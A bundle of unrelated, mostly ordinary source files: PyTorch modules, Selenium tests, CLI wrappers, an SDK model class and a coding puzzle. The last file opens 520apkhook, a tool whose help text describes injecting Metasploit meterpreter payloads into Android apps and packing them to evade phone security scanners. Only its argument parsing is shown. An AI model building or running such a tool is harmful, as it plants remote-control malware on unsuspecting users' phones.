plt.margins(0.01, None)
pdf.savefig(fig, bbox_inch="tight")
plt.close()
output_file.write("Dataset:{}{}\n".format(sep, name1))
output_file.write("{}AB{}BA\n".format(sep, sep))
output_file.write("max. family size:{}{}{}{}\n".format(sep, max(map(int, quant_ab)), sep, max(map(int, quant_ba))))
output_file.write("absolute frequency:{}{}{}{}\n".format(sep, count[len(count) - 1], sep, count2[len(count2) - 1]))
output_file.write("relative frequency:{}{:.3f}{}{:.3f}\n\n".format(sep, float(count[len(count) - 1]) / sum(count), sep, float(count2[len(count2) - 1]) / sum(count2)))
output_file.write("total nr. of reads{}{}\n".format(sep, sum(np.array(data_array[:, 0]).astype(int))))
output_file.write("total nr. of tags{}{} ({})\n".format(sep, length_regions, length_regions / 2))
output_file.write("\n\nValues from family size distribution\n")
output_file.write("{}".format(sep))
for i in group:
output_file.write("{}{}".format(i, sep))
output_file.write("\n")
j = 0
for fs in counts[1][0:len(counts[1]) - 1]:
if fs == 21:
fs = ">20"
else:
fs = "={}".format(fs)
output_file.write("FS{}{}".format(fs, sep))
if len(group) == 1:
output_file.write("{}{}".format(int(counts[0][j]), sep))
else:
for n in range(len(group)):
output_file.write("{}{}".format(int(counts[0][n][j]), sep))
output_file.write("\n")
j += 1
output_file.write("sum{}".format(sep))
if len(group) == 1:
output_file.write("{}{}".format(int(sum(counts[0])), sep))
else:
for i in counts[0]:
output_file.write("{}{}".format(int(sum(i)), sep))
output_file.write("\n")
output_file.write("\n\nIn the plot, both family sizes of the ab and ba strands were used.\nWhereas the total numbers indicate only the single count of the tags per region.\n")
output_file.write("Region{}total nr. of tags per region\n".format(sep))
for i, count in zip(group, quantAfterRegion):
output_file.write("{}{}{}\n".format(i, sep, len(count) / 2))
print("Files successfully created!")
if __name__ == '__main__':
sys.exit(compare_read_families_refGenome(sys.argv))
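# Hedged usage sketch (added); the file names are assumed examples that match the
# USAGE string in the header comment:
#   python fsd_regions.py --inputFile tags_SSCS.tabular --inputName1 tags_SSCS.tabular \
#       --bamFile DCS.bam --rangesFile regions.bed \
#       --output_tabular fsd_regions.tabular --output_pdf fsd_regions.pdf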
|
itests/lorem.py
|
skivis/BlackSheep
| 482 |
88081
|
<filename>itests/lorem.py
LOREM_IPSUM = """
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna
aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint
occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis
unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab
illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia
voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non
numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam,
quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem
vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum
fugiat quo voluptas nulla pariatur?
"""
|
25-tables/python/tables.py
|
tourdedave/selenium-tips
| 251 |
88086
|
<filename>25-tables/python/tables.py
# -*- coding: utf-8 -*-
"""
Implementation of http://elementalselenium.com/tips/25-tables
"""
import unittest
from selenium import webdriver
class Tables(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
def tearDown(self):
self.driver.quit()
def test_sort_number_column_in_ascending_order_with_limited_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(4)').click()
due_column = driver.find_elements_by_css_selector('#table1 tbody tr td:nth-of-type(4)')
dues = [float(due.text.replace('$','')) for due in due_column]
assert dues == sorted(dues)
def test_sort_number_column_in_descending_order_with_limited_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(4)').click()
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(4)').click()
due_column = driver.find_elements_by_css_selector('#table1 tbody tr td:nth-of-type(4)')
dues = [float(due.text.replace('$','')) for due in due_column]
assert dues == sorted(dues, reverse=True)
def test_sort_text_column_in_ascending_order_with_limited_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(3)').click()
email_column = driver.find_elements_by_css_selector('#table1 tbody tr td:nth-of-type(3)')
emails = [email.text for email in email_column]
assert emails == sorted(emails)
def test_sort_number_column_in_ascending_order_with_helpful_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table2 thead .dues').click()
due_column = driver.find_elements_by_css_selector('#table2 tbody .dues')
dues = [float(due.text.replace('$','')) for due in due_column]
assert dues == sorted(dues)
if __name__ == "__main__":
unittest.main()
|
LeetCode/python3/70.py
|
ZintrulCre/LeetCode_Archiver
| 279 |
88091
|
class Solution:
def climbStairs(self, n: int) -> int:
if n == 1 or n == 0:
return 1
prev, curr = 1, 1
for i in range(2, n + 1):
temp = curr
curr += prev
prev = temp
return curr
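# Hedged note (added, not part of the submission): the loop implements the Fibonacci
# recurrence f(n) = f(n-1) + f(n-2) with f(0) = f(1) = 1, because the final move onto
# step n is either one step from n-1 or two steps from n-2.
if __name__ == '__main__':
    assert [Solution().climbStairs(n) for n in range(1, 6)] == [1, 2, 3, 5, 8]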
|
backend/apps/mails/migrations/0001_initial.py
|
KuanWeiLee/froggy-service
| 174 |
88092
|
# Generated by Django 2.1.5 on 2019-01-09 14:01
from django.db import migrations
from django.contrib.postgres.operations import HStoreExtension
class Migration(migrations.Migration):
dependencies = [
]
operations = [
HStoreExtension(),
]
|
deephyper/core/analytics/_analytics.py
|
felixeperez/deephyper
| 185 |
88097
|
<reponame>felixeperez/deephyper
"""Analytics command line interface for DeepHyper.
It can be used with:
.. code-block:: console
$ deephyper-analytics --help
    Command line to analyze the outputs produced by DeepHyper.
positional arguments:
{notebook,quickplot,topk}
Kind of analytics.
notebook Generate a notebook with different types of analysis
quickplot Tool to generate a quick 2D plot from file.
topk Print the top-k configurations.
optional arguments:
-h, --help show this help message and exit
"""
import argparse
import sys
from deephyper.core.analytics import _topk, _quick_plot
def create_parser():
"""
:meta private:
"""
    parser = argparse.ArgumentParser(description="Command line to analyze the outputs produced by DeepHyper.")
subparsers = parser.add_subparsers(help="Kind of analytics.")
mapping = dict()
modules = [
_quick_plot, # output quick plots
_topk
]
for module in modules:
name, func = module.add_subparser(subparsers)
mapping[name] = func
return parser, mapping
def main():
"""
:meta private:
"""
parser, mapping = create_parser()
args = parser.parse_args()
mapping[sys.argv[1]](**vars(args))
|
WebMirror/management/rss_parser_funcs/feed_parse_extractBinhjamin.py
|
fake-name/ReadableWebProxy
| 193 |
88106
|
<reponame>fake-name/ReadableWebProxy<gh_stars>100-1000
def extractBinhjamin(item):
"""
# Binhjamin
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (vol or chp or frag or postfix):
return False
if ('SRKJ' in item['title'] or 'SRKJ-Sayonara Ryuu' in item['tags']) and (chp or vol):
return buildReleaseMessageWithType(item, '<NAME>', vol, chp, frag=frag, postfix=postfix)
if 'Unborn' in item['title']:
return buildReleaseMessageWithType(item, 'Unborn', vol, chp, frag=frag, postfix=postfix)
if 'Bu ni Mi' in item['title'] or '100 Years Of Martial Arts' in item['title']:
return buildReleaseMessageWithType(item, '100 Years Of Martial Arts', vol, chp, frag=frag, postfix=postfix)
return False
|
testing/scripts/gyp_flag_compare.py
|
jason-simmons/flutter_buildroot
| 2,151 |
88108
|
<reponame>jason-simmons/flutter_buildroot
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Wrap //tools/gn/bin/gyp_flag_compare.py for the bots.
This script wraps the GN test script in the facade needed for the
'ScriptTest' step class of the chromium recipe_module
(see scripts/slave/recipe_modules/chromium/steps.py in the build repo).
The script takes N arguments, for the N targets to compare flags for.
"""
import json
import os
import sys
import common
def main_run(args):
rc = common.run_command([sys.executable,
os.path.join(common.SRC_DIR,
'tools', 'gn', 'bin',
'gyp_flag_compare.py')] + args.args)
# TODO(dpranke): Figure out how to get a list of failures out of
# gyp_flag_compare?
json.dump({
'valid': True,
'failures': ['compare_failed'] if rc else [],
}, args.output)
return rc
def main_compile_targets(args):
# TODO(dpranke): Figure out how to get args.args plumbed through to here.
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
|
nalaf/features/relations/context.py
|
ashish-narwal/nalaf
| 103 |
88117
|
<filename>nalaf/features/relations/context.py
from nalaf.features.relations import EdgeFeatureGenerator
from nltk.stem import PorterStemmer
class LinearDistanceFeatureGenerator(EdgeFeatureGenerator):
"""
The absolute distance between the two entities in the edge.
If distance is greater than 5 (default), add to feature set.
Also add the actual distance between the two entities.
:param feature_set: the feature set for the dataset
:type feature_set: nalaf.structures.data.FeatureDictionary
:param distance: the number of tokens between the two entities, default 5
:type distance: int
:param training_mode: indicates whether the mode is training or testing
:type training_mode: bool
"""
def __init__(
self, distance=5,
prefix_entity_linear_distance_greater_than=None,
prefix_entity_linear_distance_lesser_than=None,
prefix_entity_linear_distance=None
):
self.distance = distance
self.prefix_entity_linear_distance_greater_than = prefix_entity_linear_distance_greater_than
self.prefix_entity_linear_distance_lesser_than = prefix_entity_linear_distance_lesser_than
self.prefix_entity_linear_distance = prefix_entity_linear_distance
def generate(self, dataset, feature_set, is_training_mode):
for edge in dataset.edges():
entity1_number = edge.entity1.head_token.features['id']
entity2_number = edge.entity2.head_token.features['id']
distance = abs(entity1_number - entity2_number)
if distance > self.distance:
feature_name = self.gen_prefix_feat_name("prefix_entity_linear_distance_greater_than", 5)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
else:
feature_name = self.gen_prefix_feat_name("prefix_entity_linear_distance_lesser_than", 5)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name("prefix_entity_linear_distance")
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name, value=distance)
class EntityOrderFeatureGenerator(EdgeFeatureGenerator):
"""
    This is the order of the entities in the sentence: whether entity1 occurs
first or entity2 occurs first.
:param feature_set: the feature set for the dataset
:type feature_set: nalaf.structures.data.FeatureDictionary
:param training_mode: indicates whether the mode is training or testing
:type training_mode: bool
"""
def __init__(
self,
prefix_order_entity1_entity2,
prefix_order_entity2_entity1,
):
self.prefix_order_entity1_entity2 = prefix_order_entity1_entity2
self.prefix_order_entity2_entity1 = prefix_order_entity2_entity1
def generate(self, dataset, feature_set, is_training_mode):
for edge in dataset.edges():
if edge.entity1.offset < edge.entity2.offset:
feature_name = self.gen_prefix_feat_name("prefix_order_entity1_entity2")
else:
feature_name = self.gen_prefix_feat_name("prefix_order_entity2_entity1")
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
class IntermediateTokensFeatureGenerator(EdgeFeatureGenerator):
"""
Generate the bag of words representation, masked text, stemmed text and
parts of speech tag for each of the tokens present between two entities in
an edge.
"""
def __init__(
self,
prefix_fwd_bow_intermediate=None,
prefix_fwd_bow_intermediate_masked=None,
prefix_fwd_stem_intermediate=None,
prefix_fwd_pos_intermediate=None,
prefix_bkd_bow_intermediate=None,
prefix_bkd_bow_intermediate_masked=None,
prefix_bkd_stem_intermediate=None,
prefix_bkd_pos_intermediate=None,
prefix_bow_intermediate=None,
prefix_bow_intermediate_masked=None,
prefix_stem_intermediate=None,
prefix_pos_intermediate=None,
):
self.stemmer = PorterStemmer()
"""an instance of PorterStemmer"""
self.prefix_fwd_bow_intermediate = prefix_fwd_bow_intermediate
self.prefix_fwd_bow_intermediate_masked = prefix_fwd_bow_intermediate_masked
self.prefix_fwd_stem_intermediate = prefix_fwd_stem_intermediate
self.prefix_fwd_pos_intermediate = prefix_fwd_pos_intermediate
self.prefix_bkd_bow_intermediate = prefix_bkd_bow_intermediate
self.prefix_bkd_bow_intermediate_masked = prefix_bkd_bow_intermediate_masked
self.prefix_bkd_stem_intermediate = prefix_bkd_stem_intermediate
self.prefix_bkd_pos_intermediate = prefix_bkd_pos_intermediate
self.prefix_bow_intermediate = prefix_bow_intermediate
self.prefix_bow_intermediate_masked = prefix_bow_intermediate_masked
self.prefix_stem_intermediate = prefix_stem_intermediate
self.prefix_pos_intermediate = prefix_pos_intermediate
def generate(self, dataset, feature_set, is_training_mode):
for edge in dataset.edges():
sentence = edge.same_part.sentences[edge.same_sentence_id]
if edge.entity1.head_token.features['id'] < edge.entity2.head_token.features['id']:
first = edge.entity1.head_token.features['id']
second = edge.entity2.head_token.features['id']
for i in range(first + 1, second):
token = sentence[i]
feature_name = self.gen_prefix_feat_name('prefix_fwd_bow_intermediate', token.word)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_fwd_bow_intermediate_masked', token.masked_text(edge.same_part))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_fwd_stem_intermediate', self.stemmer.stem(token.word))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_fwd_pos_intermediate', token.features['pos'])
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
else:
first = edge.entity2.head_token.features['id']
second = edge.entity1.head_token.features['id']
for i in range(first + 1, second):
token = sentence[i]
feature_name = self.gen_prefix_feat_name('prefix_bkd_bow_intermediate', token.word)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bkd_bow_intermediate_masked', token.masked_text(edge.same_part))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bkd_stem_intermediate', self.stemmer.stem(token.word))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bkd_pos_intermediate', token.features['pos'])
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
for i in range(first + 1, second):
token = sentence[i]
feature_name = self.gen_prefix_feat_name('prefix_bow_intermediate', token.word)
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_bow_intermediate_masked', token.masked_text(edge.same_part))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_stem_intermediate', self.stemmer.stem(token.word))
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
feature_name = self.gen_prefix_feat_name('prefix_pos_intermediate', token.features['pos'])
self.add_to_feature_set(feature_set, is_training_mode, edge, feature_name)
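# Illustrative note (added): for each edge, the generator above emits, per token lying
# between the two entity heads, a bag-of-words feature, a masked-text feature, a
# Porter-stemmed feature and a POS feature -- first with a direction-dependent prefix
# (fwd_* or bkd_* depending on which entity comes first) and then once more with the
# direction-independent prefixes.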
|
modules/until_module.py
|
Fork-for-Modify/UniVL
| 161 |
88121
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, <NAME>PORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch BERT model."""
import logging
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import math
from modules.until_config import PretrainedConfig
logger = logging.getLogger(__name__)
def gelu(x):
"""Implementation of the gelu activation function.
For information: OpenAI GPT's gelu is slightly different (and gives slightly different results):
0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
"""
return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
def swish(x):
return x * torch.sigmoid(x)
ACT2FN = {"gelu": gelu, "relu": torch.nn.functional.relu, "swish": swish}
class LayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
"""Construct a layernorm module in the TF style (epsilon inside the square root).
"""
super(LayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
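# Illustrative note (added): LayerNorm above normalizes over the last dimension only,
#   y = weight * (x - mean(x)) / sqrt(var(x) + eps) + bias,
# so for x of shape (batch, seq, hidden) each hidden vector is standardized before the
# learned elementwise scale and shift are applied.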
class PreTrainedModel(nn.Module):
""" An abstract class to handle weights initialization and
        a simple interface for downloading and loading pretrained models.
"""
def __init__(self, config, *inputs, **kwargs):
super(PreTrainedModel, self).__init__()
if not isinstance(config, PretrainedConfig):
raise ValueError(
"Parameter config in `{}(config)` should be an instance of class `PretrainedConfig`. "
"To create a model from a Google pretrained model use "
"`model = {}.from_pretrained(PRETRAINED_MODEL_NAME)`".format(
self.__class__.__name__, self.__class__.__name__
))
self.config = config
def init_weights(self, module):
""" Initialize the weights.
"""
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, LayerNorm):
if 'beta' in dir(module) and 'gamma' in dir(module):
module.beta.data.zero_()
module.gamma.data.fill_(1.0)
else:
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
def resize_token_embeddings(self, new_num_tokens=None):
raise NotImplementedError
@classmethod
def init_preweight(cls, model, state_dict, prefix=None, task_config=None):
old_keys = []
new_keys = []
for key in state_dict.keys():
new_key = None
if 'gamma' in key:
new_key = key.replace('gamma', 'weight')
if 'beta' in key:
new_key = key.replace('beta', 'bias')
if new_key:
old_keys.append(key)
new_keys.append(new_key)
for old_key, new_key in zip(old_keys, new_keys):
state_dict[new_key] = state_dict.pop(old_key)
if prefix is not None:
old_keys = []
new_keys = []
for key in state_dict.keys():
old_keys.append(key)
new_keys.append(prefix + key)
for old_key, new_key in zip(old_keys, new_keys):
state_dict[new_key] = state_dict.pop(old_key)
missing_keys = []
unexpected_keys = []
error_msgs = []
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, '_metadata', None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
def load(module, prefix=''):
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
module._load_from_state_dict(
state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + '.')
load(model, prefix='')
if prefix is None and (task_config is None or task_config.local_rank == 0):
logger.info("-" * 20)
if len(missing_keys) > 0:
logger.info("Weights of {} not initialized from pretrained model: {}"
.format(model.__class__.__name__, "\n " + "\n ".join(missing_keys)))
if len(unexpected_keys) > 0:
logger.info("Weights from pretrained model not used in {}: {}"
.format(model.__class__.__name__, "\n " + "\n ".join(unexpected_keys)))
if len(error_msgs) > 0:
logger.error("Weights from pretrained model cause errors in {}: {}"
.format(model.__class__.__name__, "\n " + "\n ".join(error_msgs)))
return model
@property
def dtype(self):
"""
:obj:`torch.dtype`: The dtype of the module (assuming that all the module parameters have the same dtype).
"""
try:
return next(self.parameters()).dtype
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module):
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].dtype
@classmethod
def from_pretrained(cls, config, state_dict=None, *inputs, **kwargs):
"""
Instantiate a PreTrainedModel from a pre-trained model file or a pytorch state dict.
Download and cache the pre-trained model file if needed.
"""
# Instantiate model.
model = cls(config, *inputs, **kwargs)
if state_dict is None:
return model
model = cls.init_preweight(model, state_dict)
return model
##################################
###### LOSS FUNCTION #############
##################################
class CrossEn(nn.Module):
def __init__(self,):
super(CrossEn, self).__init__()
def forward(self, sim_matrix):
logpt = F.log_softmax(sim_matrix, dim=-1)
logpt = torch.diag(logpt)
nce_loss = -logpt
sim_loss = nce_loss.mean()
return sim_loss
class MILNCELoss(nn.Module):
def __init__(self, batch_size=1, n_pair=1,):
super(MILNCELoss, self).__init__()
self.batch_size = batch_size
self.n_pair = n_pair
        # parse the version as an int tuple so that e.g. "1.10" compares correctly (float("1.10") would be 1.1)
        torch_v = tuple(int(x) for x in torch.__version__.split(".")[:2])
        self.bool_dtype = torch.bool if torch_v >= (1, 3) else torch.uint8
def forward(self, sim_matrix):
mm_mask = np.eye(self.batch_size)
mm_mask = np.kron(mm_mask, np.ones((self.n_pair, self.n_pair)))
mm_mask = torch.tensor(mm_mask).float().to(sim_matrix.device)
from_text_matrix = sim_matrix + mm_mask * -1e12
from_video_matrix = sim_matrix.transpose(1, 0)
new_sim_matrix = torch.cat([from_video_matrix, from_text_matrix], dim=-1)
logpt = F.log_softmax(new_sim_matrix, dim=-1)
mm_mask_logpt = torch.cat([mm_mask, torch.zeros_like(mm_mask)], dim=-1)
masked_logpt = logpt + (torch.ones_like(mm_mask_logpt) - mm_mask_logpt) * -1e12
new_logpt = -torch.logsumexp(masked_logpt, dim=-1)
logpt_choice = torch.zeros_like(new_logpt)
mark_ind = torch.arange(self.batch_size).to(sim_matrix.device) * self.n_pair + (self.n_pair//2)
logpt_choice[mark_ind] = 1
sim_loss = new_logpt.masked_select(logpt_choice.to(dtype=self.bool_dtype)).mean()
return sim_loss
class MaxMarginRankingLoss(nn.Module):
def __init__(self,
margin=1.0,
negative_weighting=False,
batch_size=1,
n_pair=1,
hard_negative_rate=0.5,
):
super(MaxMarginRankingLoss, self).__init__()
self.margin = margin
self.n_pair = n_pair
self.batch_size = batch_size
easy_negative_rate = 1 - hard_negative_rate
self.easy_negative_rate = easy_negative_rate
self.negative_weighting = negative_weighting
if n_pair > 1 and batch_size > 1:
alpha = easy_negative_rate / ((batch_size - 1) * (1 - easy_negative_rate))
mm_mask = (1 - alpha) * np.eye(self.batch_size) + alpha
mm_mask = np.kron(mm_mask, np.ones((n_pair, n_pair)))
mm_mask = torch.tensor(mm_mask) * (batch_size * (1 - easy_negative_rate))
self.mm_mask = mm_mask.float()
def forward(self, x):
d = torch.diag(x)
max_margin = F.relu(self.margin + x - d.view(-1, 1)) + \
F.relu(self.margin + x - d.view(1, -1))
if self.negative_weighting and self.n_pair > 1 and self.batch_size > 1:
max_margin = max_margin * self.mm_mask.to(max_margin.device)
return max_margin.mean()
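# --- Editor's hedged usage sketch (not part of the original training code) ---
# A minimal smoke test of the contrastive losses defined above on a random
# video-text similarity matrix; the 4x4 size and the margin value are arbitrary
# choices for illustration only and rely on the torch import already in this module.
if __name__ == '__main__':
    _sim = torch.randn(4, 4)                        # fake similarity matrix for 4 video-text pairs
    print('CrossEn:', CrossEn()(_sim).item())       # NCE-style loss over the diagonal
    print('MaxMargin:', MaxMarginRankingLoss(margin=0.2)(_sim).item())  # hinge ranking loss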
|
alipay/aop/api/domain/KoubeiMarketingCampaignOpenDeliveryDeleteModel.py
|
snowxmas/alipay-sdk-python-all
| 213 |
88138
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMarketingCampaignOpenDeliveryDeleteModel(object):
def __init__(self):
self._delivery_type = None
self._partner_id = None
self._shop_id = None
@property
def delivery_type(self):
return self._delivery_type
@delivery_type.setter
def delivery_type(self, value):
self._delivery_type = value
@property
def partner_id(self):
return self._partner_id
@partner_id.setter
def partner_id(self, value):
self._partner_id = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
def to_alipay_dict(self):
params = dict()
if self.delivery_type:
if hasattr(self.delivery_type, 'to_alipay_dict'):
params['delivery_type'] = self.delivery_type.to_alipay_dict()
else:
params['delivery_type'] = self.delivery_type
if self.partner_id:
if hasattr(self.partner_id, 'to_alipay_dict'):
params['partner_id'] = self.partner_id.to_alipay_dict()
else:
params['partner_id'] = self.partner_id
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMarketingCampaignOpenDeliveryDeleteModel()
if 'delivery_type' in d:
o.delivery_type = d['delivery_type']
if 'partner_id' in d:
o.partner_id = d['partner_id']
if 'shop_id' in d:
o.shop_id = d['shop_id']
return o
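# --- Editor's hedged usage sketch (not part of the SDK source) ---
# Round-trip through the dict helpers above; all field values are invented
# placeholders for illustration only.
if __name__ == '__main__':
    _model = KoubeiMarketingCampaignOpenDeliveryDeleteModel()
    _model.delivery_type = 'SELF_DELIVERY'      # hypothetical delivery type
    _model.partner_id = '2088000000000000'      # hypothetical partner id
    _model.shop_id = '2018SHOP000000'           # hypothetical shop id
    _params = _model.to_alipay_dict()
    print(json.dumps(_params))
    assert KoubeiMarketingCampaignOpenDeliveryDeleteModel.from_alipay_dict(_params).shop_id == _model.shop_id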
|
dropbox_problem/problem_8.py
|
loftwah/Daily-Coding-Problem
| 129 |
88157
|
"""This problem was asked by Dropbox.
Given a list of words, determine whether the words can be chained to form a circle.
A word X can be placed in front of another word Y in a circle if the last character
of X is the same as the first character of Y.
For example, the words ['chair', 'height', 'racket', 'touch', 'tunic'] can form the
following circle: chair --> racket --> touch --> height --> tunic --> chair."""
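# --- Editor's hedged sketch of one possible solution (not from the original repo) ---
# Plain backtracking: fix the first word, extend the chain one word at a time,
# and require the last word to loop back to the first. Exponential in the worst
# case but fine for small inputs like the example above; an Eulerian-circuit
# argument gives a polynomial-time alternative. Assumes the words are distinct.
def can_chain(words):
    if not words:
        return False
    def extend(chain, remaining):
        if not remaining:
            return chain[-1][-1] == chain[0][0]
        return any(chain[-1][-1] == w[0] and extend(chain + [w], remaining - {w})
                   for w in remaining)
    return extend([words[0]], set(words[1:]))
if __name__ == '__main__':
    print(can_chain(['chair', 'height', 'racket', 'touch', 'tunic']))  # expected: True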
|
main.py
|
wisdark/520apkhook
| 390 |
88184
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import argparse
import subprocess
try:
import rich, Crypto
except ModuleNotFoundError as e:
print('\n[!] 遇到致命错误!')
print('\n[!] 模块rich, pycryptodome未安装, 请在终端中执行命令`pip3 install rich pycryptodome`进行安装.\n')
    print('[!] 程序已结束!\n\n\tGood Bye!\n')
exit()
from utils.config import OPTIONS
from utils.ZipApkFile import ZipApkFile
from utils.CreateMsfDex import CreateMsfDex
from utils.JarCommand import JarCommand
from utils.EncryptFile import EncryptFile
from utils.InjectMsf2App import InjectMsf2App
from utils.CustomPrint import CustomPrint
from utils.CopyJniFile import CopyTree
from argparse import RawTextHelpFormatter
from shutil import copyfile, rmtree
LOGO = r'''
______ ___ ____ ___ __ __ __ __
/ ____/|__ \ / __ \ / | ____ / /__ / / / /____ ____ / /__
/___ \ __/ // / / // /| | / __ \ / //_// /_/ // __ \ / __ \ / //_/
____/ / / __// /_/ // ___ | / /_/ // ,< / __ // /_/ // /_/ // ,<
/_____/ /____/\____//_/ |_|/ .___//_/|_|/_/ /_/ \____/ \____//_/|_|
/_/
'''
def GetArguments():
parser = argparse.ArgumentParser(description=f'520ApkHook Apk注入工具 v1.1', formatter_class=RawTextHelpFormatter)
parser._optionals.title = f"参数说明"
required_arguments = parser.add_argument_group(f'Required Arguments')
required_arguments.add_argument("--lhost", dest="lhost", help="msf的IP地址", required=True)
required_arguments.add_argument("--lport", dest="lport", help="msf的端口", required=True)
required_arguments.add_argument("-m", "--mode", dest="mode", default="1", help=r'''App注入模式
1 注入Msf并且对新生成的App进行dex加固, 可以绕过手机管家检测. (默认)
2 仅注入Msf模式, 当模式1不可用时进行尝试, 此模式生成的App成功率高, 但是手机管家可以检测到
3 仅加固模式, 用来测试加固是否影响App运行.
当模式2和模式3单独运行生成App都无法使用时, 此App将不能进行利用.
''')
required_arguments.add_argument("-p", "--payload", dest="payload", default="android/meterpreter/reverse_tcp", help=r'''msf的Payload类型
Payload1 android/meterpreter/reverse_tcp (默认)
Payload2 android/meterpreter/reverse_http
Payload3 android/meterpreter/reverse_https
''')
required_arguments.add_argument("-n", "--normal-apk", dest="normalapk", help="进行注入的apk文件", required=True)
return parser.parse_args()
def ReslovePath(*args):
return os.path.abspath(os.path.join(*args))
def AddSleep():
time.sleep(0)
def ExitScript():
print('')
    Print.PrintSuccess('程序已结束! Good Bye!')
exit()
def MyExceptHook(exctype, value, traceback):
if exctype == KeyboardInterrupt:
Print.PrintError(f'你已主动退出程序...')
ExitScript()
else:
sys.__excepthook__(exctype, value, traceback)
def CheckEnv():
